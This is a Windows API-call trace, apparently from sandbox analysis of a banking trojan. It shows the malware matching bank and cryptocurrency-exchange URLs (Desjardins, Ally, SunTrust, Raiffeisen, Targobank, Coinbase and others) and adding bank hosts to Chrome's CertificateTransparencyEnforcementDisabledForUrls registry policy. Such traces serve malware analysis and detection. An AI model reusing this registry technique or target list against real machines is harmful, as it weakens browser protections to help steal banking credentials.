	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191628
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191628 | out: hHeap=0x260000) returned 1
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] strstr (_Str="*/rcrd/1527162060949058*", _SubStr="https://") returned 0x0
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191628
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191628 | out: hHeap=0x260000) returned 1
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.523] strstr (_Str="http*://*acc*desjardins.com*", _SubStr="https://") returned 0x0
	[0191.524] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.524] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.524] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.524] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.524] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.524] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.524] strstr (_Str="https://accweb.mouv.desjardins.com/identifiantunique/identification*", _SubStr="https://") returned="https://accweb.mouv.desjardins.com/identifiantunique/identification*"
	[0191.524] strncpy (in: _Dest=0x1dfa58, _Source="accweb.mouv.desjardins.com/identifiantunique/identification*", _Count=0x1a | out: _Dest="accweb.mouv.desjardins.comom") returned="accweb.mouv.desjardins.comom"
	[0191.524] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.524] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2f4) returned 0x0
	[0191.524] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2fc, lpdwDisposition=0x0) returned 0x0
	[0191.524] RegSetValueExA (in: hKey=0x2fc, lpValueName="35", Reserved=0x0, dwType=0x1, lpData="accweb.mouv.desjardins.com", cbData=0x1a | out: lpData="accweb.mouv.desjardins.com") returned 0x0
	[0191.525] RegCloseKey (hKey=0x2fc) returned 0x0
	[0191.525] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.525] strstr (_Str="accweb.mouv.desjardins.com", _SubStr="www.") returned 0x0
	[0191.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.525] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.525] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.525] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.525] strstr (_Str="https://accesd.mouv.desjardins.com/sommaire-perso/sommaire/detention*", _SubStr="https://") returned="https://accesd.mouv.desjardins.com/sommaire-perso/sommaire/detention*"
	[0191.525] strncpy (in: _Dest=0x1dfa58, _Source="accesd.mouv.desjardins.com/sommaire-perso/sommaire/detention*", _Count=0x1a | out: _Dest="accesd.mouv.desjardins.com") returned="accesd.mouv.desjardins.com"
	[0191.525] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.525] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2f8) returned 0x0
	[0191.525] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x300, lpdwDisposition=0x0) returned 0x0
	[0191.525] RegSetValueExA (in: hKey=0x300, lpValueName="36", Reserved=0x0, dwType=0x1, lpData="accesd.mouv.desjardins.com", cbData=0x1a | out: lpData="accesd.mouv.desjardins.com") returned 0x0
	[0191.526] RegCloseKey (hKey=0x300) returned 0x0
	[0191.526] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.526] strstr (_Str="accesd.mouv.desjardins.com", _SubStr="www.") returned 0x0
	[0191.526] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.526] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.526] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.526] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.526] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.526] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.526] strstr (_Str="https://accweb.mouv.desjardins.com/identifiantunique/securite*", _SubStr="https://") returned="https://accweb.mouv.desjardins.com/identifiantunique/securite*"
	[0191.526] strncpy (in: _Dest=0x1dfa58, _Source="accweb.mouv.desjardins.com/identifiantunique/securite*", _Count=0x1a | out: _Dest="accweb.mouv.desjardins.com") returned="accweb.mouv.desjardins.com"
	[0191.526] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.527] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2fc) returned 0x0
	[0191.527] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x304, lpdwDisposition=0x0) returned 0x0
	[0191.527] RegSetValueExA (in: hKey=0x304, lpValueName="37", Reserved=0x0, dwType=0x1, lpData="secure.ally.com", cbData=0xf | out: lpData="secure.ally.com") returned 0x0
	[0191.527] RegCloseKey (hKey=0x304) returned 0x0
	[0191.528] strstr (_Str="secure.ally.com", _SubStr="www.") returned 0x0
	[0191.528] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.528] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.528] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.528] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.528] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.528] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.528] strstr (_Str="https://www.ally.ccservicing.com/CCServicing/Login.do*", _SubStr="https://") returned="https://www.ally.ccservicing.com/CCServicing/Login.do*"
	[0191.528] strncpy (in: _Dest=0x1dfa58, _Source="www.ally.ccservicing.com/CCServicing/Login.do*", _Count=0x18 | out: _Dest="www.ally.ccservicing.comom") returned="www.ally.ccservicing.comom"
	[0191.528] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.528] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x300) returned 0x0
	[0191.528] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x308, lpdwDisposition=0x0) returned 0x0
	[0191.528] RegSetValueExA (in: hKey=0x308, lpValueName="38", Reserved=0x0, dwType=0x1, lpData="www.ally.ccservicing.com", cbData=0x18 | out: lpData="www.ally.ccservicing.com") returned 0x0
	[0191.529] RegCloseKey (hKey=0x308) returned 0x0
	[0191.529] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.529] strstr (_Str="www.ally.ccservicing.com", _SubStr="www.") returned="www.ally.ccservicing.com"
	[0191.529] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.529] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x304) returned 0x0
	[0191.529] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x30c, lpdwDisposition=0x0) returned 0x0
	[0191.529] RegSetValueExA (in: hKey=0x30c, lpValueName="39", Reserved=0x0, dwType=0x1, lpData="ally.ccservicing.com", cbData=0x14 | out: lpData="ally.ccservicing.com") returned 0x0
	[0191.530] RegCloseKey (hKey=0x30c) returned 0x0
	[0191.530] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.530] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.530] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.530] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.530] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.530] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.530] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.530] strstr (_Str="https://www.ally.ccservicing.com/CCServicing/ProcessLogin.do*", _SubStr="https://") returned="https://www.ally.ccservicing.com/CCServicing/ProcessLogin.do*"
	[0191.530] strncpy (in: _Dest=0x1dfa58, _Source="www.ally.ccservicing.com/CCServicing/ProcessLogin.do*", _Count=0x18 | out: _Dest="www.ally.ccservicing.com") returned="www.ally.ccservicing.com"
	[0191.530] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.530] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x308) returned 0x0
	[0191.530] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x310, lpdwDisposition=0x0) returned 0x0
	[0191.531] RegSetValueExA (in: hKey=0x310, lpValueName="40", Reserved=0x0, dwType=0x1, lpData="www.ally.com", cbData=0xc | out: lpData="www.ally.com") returned 0x0
	[0191.531] RegCloseKey (hKey=0x310) returned 0x0
	[0191.532] strstr (_Str="www.ally.com", _SubStr="www.") returned="www.ally.com"
	[0191.532] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x30c) returned 0x0
	[0191.532] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x314, lpdwDisposition=0x0) returned 0x0
	[0191.532] RegSetValueExA (in: hKey=0x314, lpValueName="41", Reserved=0x0, dwType=0x1, lpData="ally.com", cbData=0x8 | out: lpData="ally.com") returned 0x0
	[0191.533] RegCloseKey (hKey=0x314) returned 0x0
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] strstr (_Str="*/rcrd/1527162620975004*", _SubStr="https://") returned 0x0
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.533] strstr (_Str="*targobank.de/*/identification/*.cgi*", _SubStr="https://") returned 0x0
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] strstr (_Str="https://*targobank.de*", _SubStr="https://") returned="https://*targobank.de*"
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] strstr (_Str="*targobank.de/*/banque/*.aspx", _SubStr="https://") returned 0x0
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.533] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.533] strstr (_Str="*/rcrd/1554386753790741*", _SubStr="https://") returned 0x0
	[0191.533] strstr (_Str="*coinbase.com*", _SubStr="https://") returned 0x0
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] strstr (_Str="*blockchain.com*", _SubStr="https://") returned 0x0
	[0191.534] strstr (_Str="*paxful.com*", _SubStr="https://") returned 0x0
	[0191.534] strstr (_Str="*bitstamp.net*", _SubStr="https://") returned 0x0
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] strstr (_Str="*cryptocompare.com*", _SubStr="https://") returned 0x0
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] strstr (_Str="*coinmarketcap.com*", _SubStr="https://") returned 0x0
	[0191.534] strstr (_Str="*bitfinex.com*", _SubStr="https://") returned 0x0
	[0191.534] strstr (_Str="*kraken.com*", _SubStr="https://") returned 0x0
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] strstr (_Str="*coinmarketcap.com*", _SubStr="https://") returned 0x0
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.534] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.534] strstr (_Str="*/rcrd/1527162502077171*", _SubStr="https://") returned 0x0
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.534] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.535] strstr (_Str="https://*raiffeisen*.at/logincenter*", _SubStr="https://") returned="https://*raiffeisen*.at/logincenter*"
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.535] strstr (_Str="https://*raiffeisen*.at/group/private*", _SubStr="https://") returned="https://*raiffeisen*.at/group/private*"
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.535] strstr (_Str="https://*raiffeisen*.at/group/club*", _SubStr="https://") returned="https://*raiffeisen*.at/group/club*"
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.535] strstr (_Str="*/rcrd/1536679059633197*", _SubStr="https://") returned 0x0
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11916c8
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11916c8 | out: hHeap=0x260000) returned 1
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.535] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.535] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.536] strstr (_Str="https://*.suntrust.com*", _SubStr="https://") returned="https://*.suntrust.com*"
	[0191.536] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.536] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.536] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.536] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.536] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.536] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.536] strstr (_Str="https://onlinebanking.suntrust.com/UI/ajax/clientservice/changeSecurityQA", _SubStr="https://") returned="https://onlinebanking.suntrust.com/UI/ajax/clientservice/changeSecurityQA"
	[0191.536] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.suntrust.com/UI/ajax/clientservice/changeSecurityQA", _Count=0x1a | out: _Dest="onlinebanking.suntrust.com") returned="onlinebanking.suntrust.com"
	[0191.536] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.536] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x310) returned 0x0
	[0191.536] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x318, lpdwDisposition=0x0) returned 0x0
	[0191.536] RegSetValueExA (in: hKey=0x318, lpValueName="42", Reserved=0x0, dwType=0x1, lpData="onlinebanking.suntrust.com", cbData=0x1a | out: lpData="onlinebanking.suntrust.com") returned 0x0
	[0191.537] RegCloseKey (hKey=0x318) returned 0x0
